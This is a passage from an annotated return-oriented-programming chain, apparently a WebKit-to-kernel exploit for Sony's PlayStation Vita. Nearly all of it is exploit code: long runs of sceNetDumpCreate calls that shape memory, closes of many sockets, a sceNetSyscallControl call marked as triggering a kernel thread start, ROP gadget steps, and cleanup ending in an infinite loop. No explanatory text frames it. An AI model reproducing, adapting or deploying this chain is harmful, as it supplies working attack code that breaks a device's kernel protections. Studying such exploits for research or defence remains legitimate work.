  800. 0x00005948-0x0000596C: sceNetDumpCreate(exploit + 0x00010A88,0x000CAE00,0x00000000)/* r0 - lost */
  801.  
  802. 0x00005970-0x00005994: sceNetDumpCreate(exploit + 0x00010A94,0x000CAD00,0x00000000)/* r0 - lost */
  803.  
  804. 0x00005998-0x000059BC: sceNetDumpCreate(exploit + 0x00010AA0,0x000CAC00,0x00000000)/* r0 - lost */
  805.  
  806. 0x000059C0-0x000059E4: sceNetDumpCreate(exploit + 0x00010AAC,0x000CAB00,0x00000000)/* r0 - lost */
  807.  
  808. 0x000059E8-0x00005A0C: sceNetDumpCreate(exploit + 0x00010AB8,0x000CAA00,0x00000000)/* r0 - lost */
  809.  
  810. 0x00005A10-0x00005A34: sceNetDumpCreate(exploit + 0x00010AC4,0x000CA900,0x00000000)/* r0 - lost */
  811.  
  812. 0x00005A38-0x00005A5C: sceNetDumpCreate(exploit + 0x00010AD0,0x000CA800,0x00000000)/* r0 - lost */
  813.  
  814. 0x00005A60-0x00005A84: sceNetDumpCreate(exploit + 0x00010ADC,0x000CA700,0x00000000)/* r0 - lost */
  815.  
  816. 0x00005A88-0x00005AAC: sceNetDumpCreate(exploit + 0x00010AE8,0x000CA600,0x00000000)/* r0 - lost */
  817.  
  818. 0x00005AB0-0x00005AD4: sceNetDumpCreate(exploit + 0x00010AF4,0x000CA500,0x00000000)/* r0 - lost */
  819.  
  820. 0x00005AD8-0x00005AFC: sceNetDumpCreate(exploit + 0x00010B00,0x000CA400,0x00000000)/* r0 - lost */
  821.  
  822. 0x00005B00-0x00005B24: sceNetDumpCreate(exploit + 0x00010B0C,0x000CA300,0x00000000)/* r0 - lost */
  823.  
  824. 0x00005B28-0x00005B4C: sceNetDumpCreate(exploit + 0x00010B18,0x000CA200,0x00000000)/* r0 - lost */
  825.  
  826. 0x00005B50-0x00005B74: sceNetDumpCreate(exploit + 0x00010B24,0x000CA100,0x00000000)/* r0 - lost */
  827.  
  828. 0x00005B78-0x00005B9C: sceNetDumpCreate(exploit + 0x00010B30,0x000CA000,0x00000000)/* r0 - lost */
  829.  
  830. 0x00005BA0-0x00005BC4: sceNetDumpCreate(exploit + 0x00010B3C,0x000C9F00,0x00000000)/* r0 - lost */
  831.  
  832. 0x00005BC8-0x00005BEC: sceNetDumpCreate(exploit + 0x00010B48,0x000C9E00,0x00000000)/* r0 - lost */
  833.  
  834. 0x00005BF0-0x00005C14: sceNetDumpCreate(exploit + 0x00010B54,0x000C9D00,0x00000000)/* r0 - lost */
  835.  
  836. 0x00005C18-0x00005C3C: sceNetDumpCreate(exploit + 0x00010B60,0x000C9C00,0x00000000)/* r0 - lost */
  837.  
  838. 0x00005C40-0x00005C64: sceNetDumpCreate(exploit + 0x00010B6C,0x000C9B00,0x00000000)/* r0 - lost */
  839.  
  840. 0x00005C68-0x00005C8C: sceNetDumpCreate(exploit + 0x00010B78,0x000C9A00,0x00000000)/* r0 - lost */
  841.  
  842. 0x00005C90-0x00005CB4: sceNetDumpCreate(exploit + 0x00010B84,0x000C9900,0x00000000)/* r0 - lost */
  843.  
  844. 0x00005CB8-0x00005CDC: sceNetDumpCreate(exploit + 0x00010B90,0x000C9800,0x00000000)/* r0 - lost */
  845.  
  846. 0x00005CE0-0x00005D04: sceNetDumpCreate(exploit + 0x00010B9C,0x000C9700,0x00000000)/* r0 - lost */
  847.  
  848. 0x00005D08-0x00005D2C: sceNetDumpCreate(exploit + 0x00010BA8,0x000C9600,0x00000000)/* r0 - lost */
  849.  
  850. 0x00005D30-0x00005D54: sceNetDumpCreate(exploit + 0x00010BB4,0x000C9500,0x00000000)/* r0 - lost */
  851.  
  852. 0x00005D58-0x00005D7C: sceNetDumpCreate(exploit + 0x00010BC0,0x000C9400,0x00000000)/* r0 - lost */
  853.  
  854. 0x00005D80-0x00005DA4: sceNetDumpCreate(exploit + 0x00010BCC,0x000C9300,0x00000000)/* r0 - lost */
  855.  
  856. 0x00005DA8-0x00005DCC: sceNetDumpCreate(exploit + 0x00010BD8,0x000C9200,0x00000000)/* r0 - lost */
  857.  
  858. 0x00005DD0-0x00005DF4: sceNetDumpCreate(exploit + 0x00010BE4,0x000C9100,0x00000000)/* r0 - lost */
  859.  
  860. 0x00005DF8-0x00005E1C: sceNetDumpCreate(exploit + 0x00010BF0,0x000C9000,0x00000000)/* r0 - lost */
  861.  
  862. 0x00005E20-0x00005E44: sceNetDumpCreate(exploit + 0x00010BFC,0x000C8F00,0x00000000)/* r0 - lost */
  863.  
  864. 0x00005E48-0x00005E6C: sceNetDumpCreate(exploit + 0x00010C08,0x000C8E00,0x00000000)/* r0 - lost */
  865.  
  866. 0x00005E70-0x00005E94: sceNetDumpCreate(exploit + 0x00010C14,0x000C8D00,0x00000000)/* r0 - lost */
  867.  
  868. 0x00005E98-0x00005EBC: sceNetDumpCreate(exploit + 0x00010C20,0x000C8C00,0x00000000)/* r0 - lost */
  869.  
  870. 0x00005EC0-0x00005EE4: sceNetDumpCreate(exploit + 0x00010C2C,0x000C8B00,0x00000000)/* r0 - lost */
  871.  
  872. 0x00005EE8-0x00005F0C: sceNetDumpCreate(exploit + 0x00010C38,0x000C8A00,0x00000000)/* r0 - lost */
  873.  
  874. 0x00005F10-0x00005F34: sceNetDumpCreate(exploit + 0x00010C44,0x000C8900,0x00000000)/* r0 - lost */
  875.  
  876. 0x00005F38-0x00005F5C: sceNetDumpCreate(exploit + 0x00010C50,0x000C8800,0x00000000)/* r0 - lost */
  877.  
  878. 0x00005F60-0x00005F84: sceNetDumpCreate(exploit + 0x00010C5C,0x000C8700,0x00000000)/* r0 - lost */
  879.  
  880. 0x00005F88-0x00005FAC: sceNetDumpCreate(exploit + 0x00010C68,0x000C8600,0x00000000)/* r0 - lost */
  881.  
  882. 0x00005FB0-0x00005FD4: sceNetDumpCreate(exploit + 0x00010C74,0x000C8500,0x00000000)/* r0 - lost */
  883.  
  884. 0x00005FD8-0x00005FFC: sceNetDumpCreate(exploit + 0x00010C80,0x000C8400,0x00000000)/* r0 - lost */
  885.  
  886. 0x00006000-0x00006024: sceNetDumpCreate(exploit + 0x00010C8C,0x000C8300,0x00000000)/* r0 - lost */
  887.  
  888. 0x00006028-0x0000604C: sceNetDumpCreate(exploit + 0x00010C98,0x000C8200,0x00000000)/* r0 - lost */
  889.  
  890. 0x00006050-0x00006074: sceNetDumpCreate(exploit + 0x00010CA4,0x000C8100,0x00000000)/* r0 - lost */
  891.  
  892. 0x00006078-0x0000609C: sceNetDumpCreate(exploit + 0x00010CB0,0x000C8000,0x00000000)/* r0 - lost */
  893.  
  894. 0x000060A0-0x000060C4: sceNetDumpCreate(exploit + 0x00010CBC,0x000C7F00,0x00000000)/* r0 - lost */
  895.  
  896. 0x000060C8-0x000060EC: sceNetDumpCreate(exploit + 0x00010CC8,0x000C7E00,0x00000000)/* r0 - lost */
  897.  
  898. 0x000060F0-0x00006114: sceNetDumpCreate(exploit + 0x00010CD4,0x000C7D00,0x00000000)/* r0 - lost */
  899.  
  900. 0x00006118-0x0000613C: sceNetDumpCreate(exploit + 0x00010CE0,0x000C7C00,0x00000000)/* r0 - lost */
  901.  
  902. 0x00006140-0x00006164: sceNetDumpCreate(exploit + 0x00010CEC,0x000C7B00,0x00000000)/* r0 - lost */
  903.  
  904. 0x00006168-0x0000618C: sceNetDumpCreate(exploit + 0x00010CF8,0x000C7A00,0x00000000)/* r0 - lost */
  905.  
  906. 0x00006190-0x000061B4: sceNetDumpCreate(exploit + 0x00010D04,0x000C7900,0x00000000)/* r0 - lost */
  907.  
  908. 0x000061B8-0x000061DC: sceNetDumpCreate(exploit + 0x00010D10,0x000C7800,0x00000000)/* r0 - lost */
  909.  
  910. 0x000061E0-0x00006204: sceNetDumpCreate(exploit + 0x00010D1C,0x000C7700,0x00000000)/* r0 - lost */
  911.  
  912. 0x00006208-0x0000622C: sceNetDumpCreate(exploit + 0x00010D28,0x000C7600,0x00000000)/* r0 - lost */
  913.  
  914. 0x00006230-0x00006254: sceNetDumpCreate(exploit + 0x00010D34,0x000C7500,0x00000000)/* r0 - lost */
  915.  
  916. 0x00006258-0x0000627C: sceNetDumpCreate(exploit + 0x00010D40,0x000C7400,0x00000000)/* r0 - lost */
  917.  
  918. 0x00006280-0x000062A4: sceNetDumpCreate(exploit + 0x00010D4C,0x000C7300,0x00000000)/* r0 - lost */
  919.  
  920. 0x000062A8-0x000062CC: sceNetDumpCreate(exploit + 0x00010D58,0x000C7200,0x00000000)/* r0 - lost */
  921.  
  922. 0x000062D0-0x000062F4: sceNetDumpCreate(exploit + 0x00010D64,0x000C7100,0x00000000)/* r0 - lost */
  923.  
  924. 0x000062F8-0x0000631C: sceNetDumpCreate(exploit + 0x00010D70,0x000C7000,0x00000000)/* r0 - lost */
  925.  
  926. 0x00006320-0x00006344: sceNetDumpCreate(exploit + 0x00010D7C,0x000C6F00,0x00000000)/* r0 - lost */
  927.  
  928. 0x00006348-0x0000636C: sceNetDumpCreate(exploit + 0x00010D88,0x000C6E00,0x00000000)/* r0 - lost */
  929.  
  930. 0x00006370-0x00006394: sceNetDumpCreate(exploit + 0x00010D94,0x000C6D00,0x00000000)/* r0 - lost */
  931.  
  932. 0x00006398-0x000063BC: sceNetDumpCreate(exploit + 0x00010DA0,0x000C6C00,0x00000000)/* r0 - lost */
  933.  
  934. 0x000063C0-0x000063E4: sceNetDumpCreate(exploit + 0x00010DAC,0x000C6B00,0x00000000)/* r0 - lost */
  935.  
  936. 0x000063E8-0x0000640C: sceNetDumpCreate(exploit + 0x00010DB8,0x000C6A00,0x00000000)/* r0 - lost */
  937.  
  938. 0x00006410-0x00006434: sceNetDumpCreate(exploit + 0x00010DC4,0x000C6900,0x00000000)/* r0 - lost */
  939.  
  940. 0x00006438-0x0000645C: sceNetDumpCreate(exploit + 0x00010DD0,0x000C6800,0x00000000)/* r0 - lost */
  941.  
  942. 0x00006460-0x00006484: sceNetDumpCreate(exploit + 0x00010DDC,0x000C6700,0x00000000)/* r0 - lost */
  943.  
  944. 0x00006488-0x000064AC: sceNetDumpCreate(exploit + 0x00010DE8,0x000C6600,0x00000000)/* r0 - lost */
  945.  
  946. 0x000064B0-0x000064D4: sceNetDumpCreate(exploit + 0x00010DF4,0x000C6500,0x00000000)/* r0 - lost */
  947.  
  948. 0x000064D8-0x000064FC: sceNetDumpCreate(exploit + 0x00010E00,0x000C6400,0x00000000)/* r0 - lost */
  949.  
  950. 0x00006500-0x00006524: sceNetDumpCreate(exploit + 0x00010E0C,0x000C6300,0x00000000)/* r0 - lost */
  951.  
  952. 0x00006528-0x0000654C: sceNetDumpCreate(exploit + 0x00010E18,0x000C6200,0x00000000)/* r0 - lost */
  953.  
  954. 0x00006550-0x00006574: sceNetDumpCreate(exploit + 0x00010E24,0x000C6100,0x00000000)/* r0 - lost */
  955.  
  956. 0x00006578-0x0000659C: sceNetDumpCreate(exploit + 0x00010E30,0x000C6000,0x00000000)/* r0 - lost */
  957.  
  958. 0x000065A0-0x000065C4: sceNetDumpCreate(exploit + 0x00010E3C,0x00001000,0x00000000)/* r0 - lost */
  959.  
  960. 0x000065C8-0x000065EC: sceNetDumpCreate(exploit + 0x00010E48,0x00001000,0x00000000)/* r0 - lost */
  961. 0x000065F0-0x00006614: sceKernelStartThread([exploit + 0x00008620/*mhm_threadid*/], 0x1C/*arglen*/,[exploit + 0x0000881C]/*argp*/)
  962. 0x00006618-0x0000662C: sceKernelDelayThread(1500000 /* 3/2 sec*/);
  963. 0x00006630-0x0000664C: sceNetSyscallClose([exploit + 0x00008470])
  964.  
  965. 0x00006650-0x0000666C: sceNetSyscallClose([exploit + 0x00008478])
  966.  
  967. 0x00006670-0x0000668C: sceNetSyscallClose([exploit + 0x00008480])
  968.  
  969. 0x00006690-0x000066AC: sceNetSyscallClose([exploit + 0x00008488])
  970.  
  971. 0x000066B0-0x000066CC: sceNetSyscallClose([exploit + 0x00008490])
  972.  
  973. 0x000066D0-0x000066EC: sceNetSyscallClose([exploit + 0x00008498])
  974.  
  975. 0x000066F0-0x0000670C: sceNetSyscallClose([exploit + 0x000084A0])
  976.  
  977. 0x00006710-0x0000672C: sceNetSyscallClose([exploit + 0x000084A8])
  978.  
  979. 0x00006730-0x0000674C: sceNetSyscallClose([exploit + 0x000084B0])
  980.  
  981. 0x00006750-0x0000676C: sceNetSyscallClose([exploit + 0x000084B8])
  982.  
  983. 0x00006770-0x0000678C: sceNetSyscallClose([exploit + 0x000084C0])
  984.  
  985. 0x00006790-0x000067AC: sceNetSyscallClose([exploit + 0x000084C8])
  986.  
  987. 0x000067B0-0x000067CC: sceNetSyscallClose([exploit + 0x000084D0])
  988.  
  989. 0x000067D0-0x000067EC: sceNetSyscallClose([exploit + 0x000084D8])
  990.  
  991. 0x000067F0-0x0000680C: sceNetSyscallClose([exploit + 0x000084E0])
  992.  
  993. 0x00006810-0x0000682C: sceNetSyscallClose([exploit + 0x000084E8])
  994.  
  995. 0x00006830-0x0000684C: sceNetSyscallClose([exploit + 0x000084F0])
  996.  
  997. 0x00006850-0x0000686C: sceNetSyscallClose([exploit + 0x000084F8])
  998.  
  999. 0x00006870-0x0000688C: sceNetSyscallClose([exploit + 0x00008500])
  1000.  
  1001. 0x00006890-0x000068AC: sceNetSyscallClose([exploit + 0x00008508])
  1002.  
  1003. 0x000068B0-0x000068CC: sceNetSyscallClose([exploit + 0x00008510])
  1004.  
  1005. 0x000068D0-0x000068EC: sceNetSyscallClose([exploit + 0x00008518])
  1006.  
  1007. 0x000068F0-0x0000690C: sceNetSyscallClose([exploit + 0x00008520])
  1008.  
  1009. 0x00006910-0x0000692C: sceNetSyscallClose([exploit + 0x00008528])
  1010.  
  1011. 0x00006930-0x0000694C: sceNetSyscallClose([exploit + 0x00008530])
  1012.  
  1013. 0x00006950-0x0000696C: sceNetSyscallClose([exploit + 0x00008538])
  1014.  
  1015. 0x00006970-0x0000698C: sceNetSyscallClose([exploit + 0x00008540])
  1016.  
  1017. 0x00006990-0x000069AC: sceNetSyscallClose([exploit + 0x00008548])
  1018.  
  1019. 0x000069B0-0x000069CC: sceNetSyscallClose([exploit + 0x00008550])
  1020.  
  1021. 0x000069D0-0x000069EC: sceNetSyscallClose([exploit + 0x00008558])
  1022.  
  1023. 0x000069F0-0x00006A0C: sceNetSyscallClose([exploit + 0x00008560])
  1024.  
  1025. 0x00006A10-0x00006A2C: sceNetSyscallClose([exploit + 0x00008568])
  1026.  
  1027. 0x00006A30-0x00006A4C: sceNetSyscallClose([exploit + 0x00008570])
  1028.  
  1029. 0x00006A50-0x00006A6C: sceNetSyscallClose([exploit + 0x00008578])
  1030.  
  1031. 0x00006A70-0x00006A8C: sceNetSyscallClose([exploit + 0x00008580])
  1032.  
  1033. 0x00006A90-0x00006AAC: sceNetSyscallClose([exploit + 0x00008588])
  1034.  
  1035. 0x00006AB0-0x00006ACC: sceNetSyscallClose([exploit + 0x00008590])
  1036.  
  1037. 0x00006AD0-0x00006AEC: sceNetSyscallClose([exploit + 0x00008598])
  1038.  
  1039. 0x00006AF0-0x00006B0C: sceNetSyscallClose([exploit + 0x000085A0])
  1040.  
  1041. 0x00006B10-0x00006B2C: sceNetSyscallClose([exploit + 0x000085A8])
  1042.  
  1043. 0x00006B30-0x00006B4C: sceNetSyscallClose([exploit + 0x000085C4])
  1044.  
  1045.  
  1046. //Trigger "sceKernelStartThread" in Kernel
  1047. 0x00006B50-0x00006B74: sceNetSyscallControl(0,0,exploit + 0x00008840/*Kernel Thread args*/,0xFC);
  1048. 0x00006B78-0x00006B94: sceNetDumpDestroy([exploit + 0x000085DC]);
  1049.  
  1050.  
  1051. 0x00006B98-0x00006BAC: sceKernelDelayThread(1000000 /*1 sec*/);
  1052. 0x00006BB0-:
  1053. R8 = [exploit + 0x00008810] + sceWebKitBase + 0x00000575
  1054. R0 = R7
  1055. R1 = R6
  1056. POP {R4,PC}
  1057. BLX R3 / POP {R4,PC}
  1058. 0x00006C00-0x00006C14: sceNetDumpDestroy(0x00001770/*!!const!!*/)
  1059.  
  1060. 0x00006C18-0x00006C2C: sceNetDumpDestroy(0x00001771/*!!const!!*/)
  1061.  
  1062. 0x00006C30-0x00006C44: sceNetDumpDestroy(0x00001772/*!!const!!*/)
  1063.  
  1064. 0x00006C48-0x00006C5C: sceNetDumpDestroy(0x00001773/*!!const!!*/)
  1065.  
  1066. 0x00006C60-0x00006C74: sceNetDumpDestroy(0x00001774/*!!const!!*/)
  1067.  
  1068. 0x00006C78-0x00006C8C: sceNetDumpDestroy(0x00001775/*!!const!!*/)
  1069.  
  1070. 0x00006C90-0x00006CA4: sceNetDumpDestroy(0x00001776/*!!const!!*/)
  1071.  
  1072. 0x00006CA8-0x00006CBC: sceNetDumpDestroy(0x00001777/*!!const!!*/)
  1073.  
  1074. 0x00006CC0-0x00006CD4: sceNetDumpDestroy(0x00001778/*!!const!!*/)
  1075.  
  1076. 0x00006CD8-0x00006CEC: sceNetDumpDestroy(0x00001779/*!!const!!*/)
  1077.  
  1078. 0x00006CF0-0x00006D04: sceNetDumpDestroy(0x0000177A/*!!const!!*/)
  1079.  
  1080. 0x00006D08-0x00006D1C: sceNetDumpDestroy(0x0000177B/*!!const!!*/)
  1081.  
  1082. 0x00006D20-0x00006D34: sceNetDumpDestroy(0x0000177C/*!!const!!*/)
  1083.  
  1084. 0x00006D38-0x00006D4C: sceNetDumpDestroy(0x0000177D/*!!const!!*/)
  1085.  
  1086. 0x00006D50-0x00006D64: sceNetDumpDestroy(0x0000177E/*!!const!!*/)
  1087.  
  1088. 0x00006D68-0x00006D7C: sceNetDumpDestroy(0x0000177F/*!!const!!*/)
  1089.  
  1090. 0x00006D80-0x00006D94: sceNetDumpDestroy(0x00001780/*!!const!!*/)
  1091.  
  1092. 0x00006D98-0x00006DAC: sceNetDumpDestroy(0x00001781/*!!const!!*/)
  1093.  
  1094. 0x00006DB0-0x00006DC4: sceNetDumpDestroy(0x00001782/*!!const!!*/)
  1095.  
  1096. 0x00006DC8-0x00006DDC: sceNetDumpDestroy(0x00001783/*!!const!!*/)
  1097.  
  1098. 0x00006DE0-0x00006DF4: sceNetDumpDestroy(0x00001784/*!!const!!*/)
  1099.  
  1100. 0x00006DF8-0x00006E0C: sceNetDumpDestroy(0x00001785/*!!const!!*/)
  1101.  
  1102. 0x00006E10-0x00006E24: sceNetDumpDestroy(0x00001786/*!!const!!*/)
  1103.  
  1104. 0x00006E28-0x00006E3C: sceNetDumpDestroy(0x00001787/*!!const!!*/)
  1105.  
  1106. 0x00006E40-0x00006E54: sceNetDumpDestroy(0x00001788/*!!const!!*/)
  1107.  
  1108. 0x00006E58-0x00006E6C: sceNetDumpDestroy(0x00001789/*!!const!!*/)
  1109.  
  1110. 0x00006E70-0x00006E84: sceNetDumpDestroy(0x0000178A/*!!const!!*/)
  1111.  
  1112. 0x00006E88-0x00006E9C: sceNetDumpDestroy(0x0000178B/*!!const!!*/)
  1113.  
  1114. 0x00006EA0-0x00006EB4: sceNetDumpDestroy(0x0000178C/*!!const!!*/)
  1115.  
  1116. 0x00006EB8-0x00006ECC: sceNetDumpDestroy(0x0000178D/*!!const!!*/)
  1117.  
  1118. 0x00006ED0-0x00006EE4: sceNetDumpDestroy(0x0000178E/*!!const!!*/)
  1119.  
  1120. 0x00006EE8-0x00006EFC: sceNetDumpDestroy(0x0000178F/*!!const!!*/)
  1121.  
  1122. 0x00006F00-0x00006F14: sceNetDumpDestroy(0x00001790/*!!const!!*/)
  1123. 0x00006F18-ENDOFROPCHAIN: sceWebKit + 0x00000519 INFINITE LOOP